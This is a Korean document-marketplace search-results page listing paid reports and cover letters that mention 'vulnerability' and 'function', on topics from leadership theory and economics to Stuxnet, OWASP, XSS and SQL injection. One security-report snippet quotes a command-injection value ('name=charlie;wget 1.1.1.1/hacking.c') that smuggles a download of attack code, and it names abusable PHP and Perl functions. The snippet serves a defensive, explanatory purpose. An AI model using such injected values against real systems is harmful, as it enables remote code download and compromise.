• 통큰쿠폰이벤트-통합
  • 통합검색(1,133)
  • 리포트(899)
  • 시험자료(113)
  • 자기소개서(63)
  • 방송통신대(28)
  • 논문(24)
  • 서식(6)

"취약성 함수" 검색결과 301-320 / 1,133건

  • 리더십의 특성론(자질론)과 상황론
    라고 하였으며, 또한 특성론 내지 자질론의 취약점을 월과 호킨스(Wall & Hawkins, 1964:394)는 "그와 같은 자질을 찾기 위한 지난 100년 간의 조사연구의 결과는 ... 이에 비하여 과거의 특성론에서의 리더십의 공식은 L=f(l, f)로 표시할 수 있다.즉 단순히 지도자와 부하의 함수관계로 표현하고 있다. ... 이에 대해 상황론에서의 리더십은 지도자와 부하 및 상황의 함수관계로 규정할 수 있다.1940년대 말 이래 행해진 리더십에 관한 많은 연구는 지도자가 리더십을 행사하는 상황적 측면을
    리포트 | 3페이지 | 1,000원 | 등록일 2019.01.25
  • 광고및촉진관리 7장광고예산 ppt
    광고예산 02 실무에서 사용되는 광고예산결정방법 가용자금법 임의할당법 매출비율법 경쟁사 기준법 순전히 경영자의 느낌으로 광고예산이 책정되는 방식 가용자금법보다 더 취약한 광고예산결정방법 ... 매출은 광고외에 다른 마케팅믹스요인에 의해서도 영향을 받는다 .[ 오목증가형의 반응함수 ] 한계분석 1 2 판매반응함수 매출액 광고비 오목증가형의 반응함수 ㅅ 광고 및 촉진관리론 제 ... 광고예산 01 광고예산결정의 이론적 접근[ 두 곡선의 공통점 ] 한계분석 1 2 판매반응함수 매출액 광고비 오목증가형의 반응함수 매출액 광고비 S 형의 반응함수 구간 A 구간 B 구간
    리포트 | 26페이지 | 1,000원 | 등록일 2019.04.09
  • 악성코드분석
    그리고 나서 쉘코드는 “csrss.exe”를 구성하고 있는 스턱스넷 메인 DLL을 로드한다.1.3.5) Windows Task Scheduler 취약 함수, Data, 실행 파일의 ... Window 2000/XP 32bit 시스템 환경에 영향을 주며, Windows커널 모드 드라이버가 ‘NtSendUserInput’ 시스템 요청 내에 함수 포인터를 위치시키는데 이용하는 ... 이 중에서 알려 지지 않았던 취약점들도 대다수이다.※ 윈도우 운영체제 취약점- Windows Shell LNK 취약점- Windows Server Service 취약점- Windows
    리포트 | 17페이지 | 1,000원 | 등록일 2017.12.18
  • LG CNS 합격 자소서
    [VOD앱 취약점분석]국내 통신사에서 제공하는 VOD앱의 취약점을 분석한 경험이 있습니다. ... 단순히 엑셀 함수들을 이용한 프로그램이었지만, 제 기술을 통해 다른 사람을 편리해진 것에 대해 행복을 느낀 소중한 경험이었습니다.이에 전역 후 컴퓨터공학을 복수전공으로 선택했습니다. ... 분석 중, 해당 앱이 인증서의 신뢰유무를 확인하지 않아 취약하다는 것을 발견했습니다.
    자기소개서 | 1페이지 | 3,000원 | 등록일 2017.05.21
  • 조선대 정보보호 기말 범위 개인정리본, 보고 A+ 맞은 자료
    붙여넣기 공격으로 위변조 가능, 동일한 plain은 동일한 cipher이 나오는 취약점 존재)- CBC : EBC의 취약점을 해결한 모드, 블록들이 연결되어 있다, 동일한 plain을 ... 14번의 라운드를 가짐* 128비트의 라운드 키(128비트 = 16바이트 = 4워드)Nr 라운드동안 Nr + 1개의 라운드 키가 필요함 (44word, 10라운드)* AES는 4가지 함수로 ... 3장AES - DES를 대체하기 위해 만들어짐이유* DES는 키가 짧아 무차별 대입 공격에 취약* 3DES는 소프트웨어 코드가 비효율적임* 3DES는 매 라운드가 너무 느기기도 하고
    리포트 | 7페이지 | 2,500원 | 등록일 2019.06.28
  • 사이버보안기술과 사이버범죄 인강 레포트 20점 만점
    알파고와 딥블루를 비교 하였을 때 평가함수의 설계가 차이가 있다. ... 딥블루는 직접 평가함수를 사람이 만들어 넣었지만 알파고의 경우 다른 사람들의 바둑을 보고 학습한 후 혼자서 대국을 해봄으로써 승패를 예측하는 회귀함수를 스스로 만들어낼 수 있다. 20년 ... 해킹범죄의 정의해킹범죄는 허락되지 않은 사용자가 보안이 취약한 것을 노려 자료를 열람하거나 변조나 삭제하여 피해를 주는 행위를 말한다.
    리포트 | 4페이지 | 1,000원 | 등록일 2017.06.19
  • OWASP 2010 2013 2017 TOP10 조사 및 분석
    확인 방법링크 및 폼들이 예측할 수 없는 CSRF 토큰이 누락되었는지상태를 변경하는 함수는 호출하는 링크나 폼에 집중해야 함다단계 처리 기능은 기본적인 방어책이 없기 때문에 확인해야함브라우저에서 ... 있는 컴포넌트 사용알려진 취약점이 있는 컴포넌트 사용취약점이 존재하고 공개된 컴포넌트를 사용하는 것취약점 확인 방법사용중인 코드를 검토 해당 컴포넌트의 취약한 부분을 사용하고 있는지 ... 직접 객체 참조취약한 직접 객체 참조파일, 데이터베이스 키와 같은 내부적으로 처리되는 오브젝트가 노출되는 경우 또는 다운로드 취약점을 이용하여 시스템 파일에 접근하는 취약점 등을
    리포트 | 18페이지 | 3,000원 | 등록일 2018.12.05
  • 화학공학과 전과신청서 및 학업계획서
    우선 이번 방학 때에는 1학기 때 대학에서는 수학공부를 어떻게 해야 하는지 몰라서 조금 소홀히 했던 미적분과 초월함수 부분을 이번 방학동안 다시 살펴보려고 합니다. ... 영어공부는 우선 토익 900점을 넘기는 것을 목표로 일주일에 5시간 정도씩 비교적 취약한 RC 부분을 집중적으로 공부하고, 토익에 익숙해지기 위해 광운 토익을 매번 응시하고 6개월에
    자기소개서 | 1페이지 | 3,000원 | 등록일 2018.03.05 | 수정일 2020.07.14
  • 목가구의 정의 및 종류와 용도 결구방법
    함수율까지 건조해서 사용해야함 →나무의 변형을 최소화 시키기 위해 함수율 24% 이하 ( 최적 18%) 인 목재를 사용2. ... 목가구의 특징 나무의 색과 표면의 변화 나무 껍질에 의해 표면이 거침 → 표면이 매끄러운 상태 → 나무가 갈라짐 목재의 함수율 - 함수율 : 목재 내에 포함된 수분의 양 목재는 기건 ... 맞춤이라고도 하며 위에 부재를 업힐장 아래 부재를 받을장이라고 한다 . ( 반턱 이음 ) 갈퀴 이음 각 부재의 반턱을 경사지게 따내어 서로 물리게 하는 이음으로 인장력이 작용할 경우 취약
    리포트 | 74페이지 | 10,000원 | 등록일 2019.09.03
  • 구글 검색엔진을 통한 웹사이트 취약점 노출 최소화에 대한 연구
    [표2] ASP 내장함수 HTTP_USER_AGENT, HTTP_REFERER 비교함수표현형태Request.ServerVariables("HTTP_USER_AGENT")Mozilla ... 구글 검색엔진을 통한 웹사이트 취약점 노출 최소화에 대한 연구요약요약.키워드:구글해킹, 검색엔진, 개인정보, 웹사이트 취약점546정보과학회논문지: 정보통신 제 31 권 제 6 호(2004.12 ... 따라서 소스코드에서 구현하는 프로그래밍적인 방법을 제안하게 되었다.ASP의 경우 내장함수인 HTTP_USER_AGENT, HTTP_REFERER를 통해 정상적이지 않은 접속경로를 가지거나
    리포트 | 4페이지 | 2,000원 | 등록일 2017.05.22 | 수정일 2020.05.24
  • 구글 검색엔진을 통한 웹사이트 취약점 노출 최소화에 대한 연구
    구글검색엔진을 통한 웹사이트 취약점 노출 최소화에 대한 연구서론 Robots.txt, 메타태그 사용 프로그래밍적인 방법 결론서론구글 검색을 통한 취약적 노출노출 유형 구글 검색 예시 ... 노출되는 문제 검색엔진 규약 및 권고안 수많은 검색엔진 검색엔진 목록 파악 어려움 검색봇에 의해 이미 노출된 경우에 악의를 가진 사용자의 직접적인 접근을 막는 방안이 필요 한계점함수 ... s= f= z=A q= 검색어 ASP 내장함수login.asp 와 login_action.asp 와 같이 로그인을 수행하는 코드 넘겨받은 값을 받아서 처리하는 login_action.asp
    리포트 | 20페이지 | 2,000원 | 등록일 2017.05.22
  • 나이스정보통신 IT서버부문 합격 자소서
    엑셀 함수들을 단순히 활용한 것이었지만, 제 기술을 통해 다른 사람을 편리해진 것에 대해 행복을 느낀 소중한 경험이었습니다.이에 전역 후 컴퓨터공학을 복수전공으로 선택했습니다. ... [끈기와 승부근성 - VOD앱 취약점분석]주어진 프로젝트의 성공을 위해 끊임없이 노력합니다. 국내 통신사에서 제공하는 VOD앱의 취약점을 분석한 프로젝트 경험이 있습니다. ... 나아가 해킹 툴 만들어보기, VOD앱 취약점 분석, BGP와 인증서 관련 학과 프로젝트에 참여하며 IT전문가로의 꿈에 한 걸음 더 내딛을 수 있었습니다.
    자기소개서 | 1페이지 | 3,000원 | 등록일 2017.05.21
  • 아시아나IDT 합격 자소서
    단순히 엑셀 함수들을 활용한 것이었지만, 제 기술을 통해 다른 사람을 편리해진 것에 대해 행복을 느낀 소중한 경험이었습니다.이에 전역 후 컴퓨터공학을 복수전공으로 선택했습니다. ... 새로 발표된 취약점이다보니 관련자료를 찾기 힘들었고 이에 외부인이나 경력자들에게 부탁을 하는 팀들을 볼 수 있었습니다.하지만 교수님의 목적은 취약점을 실제로 한 번 구현해보고 이를 ... 선택해 가상환경을 구축하고 취약점을 시연하는 프로젝트를 수행했던 경험이 있습니다.
    자기소개서 | 2페이지 | 3,000원 | 등록일 2017.05.21
  • 보안프로토콜 ppt 발표자료
    보안전문가들의 말을 인용 , GSM 폰이 해킹에 취약한 점이 있어 해커들이 원격 조종으로 메시지 전송이나 전화 걸기 등을 쉽게 할 수 있음 GSM 폰은 해킹에 취약다는 점을 이용 , ... . · DES 와 같은 대칭키 암호 알고리즘을 기반으로 한 MAC(Message Authentication Codes) 또는 MD5,SHA-1 등과 같은 해쉬 함수를 사용할 수 있다 ... , 이것은 TDMA , CDMA 와 함께 가장 널리 사용되는 3 개의 디지털 무선전화기술 중 하나임 .GSM 의 구조GSM 의 문제점 유럽이동통신규격 (GSM) 폰이 해킹에 특히 취약
    리포트 | 21페이지 | 1,000원 | 등록일 2019.02.22
  • sql injection 분석 및 보안대책
    함수언어취약 함수PHPrequire(), include(), eval(), preg_replace(),exec(), passthru(), system(), fopen(), popen ... name=charlie;wget 1.1.1.1/hacking.c(2) PERL의 취약함수 open( )open( ) 함수는 두번째 인수가 | (파이프)로 끝날 경우 명령어로 인식악용사례파라미터 ... /inetd |(3) PHP의 취약함수 fopen( )fopen( ) 로컬경로의 파일이나 URL 경로의 파일을 읽기 모드나 쓰기 모드로 열어준다.악용사례파라미터=http://www.hac수정
    리포트 | 85페이지 | 5,000원 | 등록일 2015.11.26
  • 경기변동의 이론 및 실증연구방법 - 화폐적 경기변동 이론, 실물적 경기변동 이론의 비교 -
    루카스(Lucas) 모형1) 루카스 공급함수와 섬모델총공급 = 자연산출량 +α(실제물가상승률-예상물가상승률)루카스의 섬 모델에 따르면 불완전정보와 합리적 기대 하의 개별경제주체는 물가인식에 ... 의의1) 등장배경화폐적 경기변동이론이 경기변동의 공행성은 잘 설명하고 있으나, “지속성”에 대한 설명이 취약하며 화폐적 경기변동이론은 ‘산출량 변동>고용량 변동’의 현실을 이론이 설명하지
    리포트 | 3페이지 | 1,000원 | 등록일 2019.09.13
  • [강연 리뷰] 2019년 통화신용정책 운영 방향
    실질머니 갭률: 통화신용 함수로 추정. ... 취약차주 부채규모를 보여준다. ... 전체 1600조원이 가계 부채 규모인데 취약 차주는 100조원 미만이다.취약차주는 다중채무자이면서 7~10등급 신용등급자, 또는 하위 30% 소득자를 말한다.주택 매매가격은 다주택자
    리포트 | 4페이지 | 1,000원 | 등록일 2019.01.17
  • 가용자료가 제한된 경우 화산재 피해 예측을 위한 손상함수 구축
    한국지구과학회 유순영, 윤성민, 강주화, 최미란
    논문 | 12페이지 | 4,300원 | 등록일 2016.04.02 | 수정일 2023.04.05
  • xss 보안 대책
    SS 해킹 실습 Simulation새로 고침 X SS 해킹 실습 SimulationX SS 해킹 실습 SimulationX SS 해킹 실습 SimulationMapPath () 함수를 ... #38 Script 문장 특수 문자를 메타 문자로 변환 HTML 특수 문자를 메타 문자로 변환 해 주어야 XSS 공격에 안전 보 안 대책특수 문자를 메타문자로 변형 Replace 함수만 ... XSS 종류 흐름도 1 2 3 4 취약점 있는 게시판 Reflective XSS 악의적인 스크립트가 사용자 쪽에서 실행되는 방식 ( 링크이용 ) 발생 장소 공격 방식 XSS 취약점이
    리포트 | 25페이지 | 4,500원 | 등록일 2015.11.26
  • 롯데정보통신 IT부문 합격 자소서
    단순히 엑셀 함수들을 이용한 프로그램이었지만, 제 기술을 통해 다른 사람을 편리해진 것에 대해 행복을 느낀 소중한 경험이었습니다.이에 전역 후 컴퓨터공학을 복수전공으로 선택했습니다. ... 또, VOD앱 취약점 분석, 백신 우회 바이러스 재현 등 학과 보안프로젝트에 참여하였습니다. ... 취약점 분석을 위해, 로그인 과정부터 VOD 구매까지 서버와 호스트가 주고받는 패킷들을 수집했습니다.
    자기소개서 | 2페이지 | 3,000원 | 등록일 2017.05.21
  • 아이템매니아 이벤트
  • 유니스터디 이벤트
AI 챗봇
2024년 09월 14일 토요일
AI 챗봇
안녕하세요. 해피캠퍼스 AI 챗봇입니다. 무엇이 궁금하신가요?
10:13 오후
문서 초안을 생성해주는 EasyAI
안녕하세요. 해피캠퍼스의 방대한 자료 중에서 선별하여 당신만의 초안을 만들어주는 EasyAI 입니다.
저는 아래와 같이 작업을 도와드립니다.
- 주제만 입력하면 목차부터 본문내용까지 자동 생성해 드립니다.
- 장문의 콘텐츠를 쉽고 빠르게 작성해 드립니다.
9월 1일에 베타기간 중 사용 가능한 무료 코인 10개를 지급해 드립니다. 지금 바로 체험해 보세요.
이런 주제들을 입력해 보세요.
- 유아에게 적합한 문학작품의 기준과 특성
- 한국인의 가치관 중에서 정신적 가치관을 이루는 것들을 문화적 문법으로 정리하고, 현대한국사회에서 일어나는 사건과 사고를 비교하여 자신의 의견으로 기술하세요
- 작별인사 독후감
방송통신대학 관련 적절한 예)
- 국내의 사물인터넷 상용화 사례를 찾아보고, 앞으로 기업에 사물인터넷이 어떤 영향을 미칠지 기술하시오
5글자 이하 주제 부적절한 예)
- 정형외과, 아동학대